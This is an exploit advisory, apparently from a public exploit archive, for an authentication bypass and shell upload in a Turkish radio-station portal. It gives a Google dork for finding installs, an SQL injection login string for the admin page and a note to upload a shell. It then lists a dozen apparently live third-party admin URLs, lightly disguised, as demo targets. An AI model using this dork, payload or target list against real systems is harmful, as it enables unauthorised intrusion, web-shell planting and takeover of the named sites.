###################### # Exploit Title : Turkish Radyo Portal Authentication Bypass / Shell Upload # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.radyositesikur.com/ # Google Dork : Radyo inurl:haberoku.php?id= # Date: 2015/12/01 # Version : V1 & V2 # ###################### # PoC: # target/admin # To bypass the login page enter '=' 'or' for username and password input. # Login And Upload Shell D: # Youtube Demo : https://www.youtube.com/watch?v=0tvAu_g47Zc # #Demo: # #http://dorukfm.frXeevar.com/admin/yonetim.php #http://www.eceXmfm.com/admin/yonetim.php #http://ogrencirXadyosu.net.tr/admin/yonetim.php #http://www.sXuperturkfm.com/admin/yonetim.php #http://wwwX.e.sesli-dj.com/radyo/admin/yonetim.php #http://wwXw.sohbetalafm.com/admin/yonetim.php #http://bXtm72.96.lt/admin/yonetim.php #http://dorukfm.freeXvar.com/admin/yonetim.php #http://radyoacapeXlla.16mb.com/radyo/admin/yonetim.php #http://radyo.selcXuklu2.com/admin/yonetim.php #http://www.kralXfmradyo.net/admin/yonetim.php #http://www.anXtalyaradyo07.com/admin/yonetim.php #http://www.gXevezefm.org/index.php # # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) ######################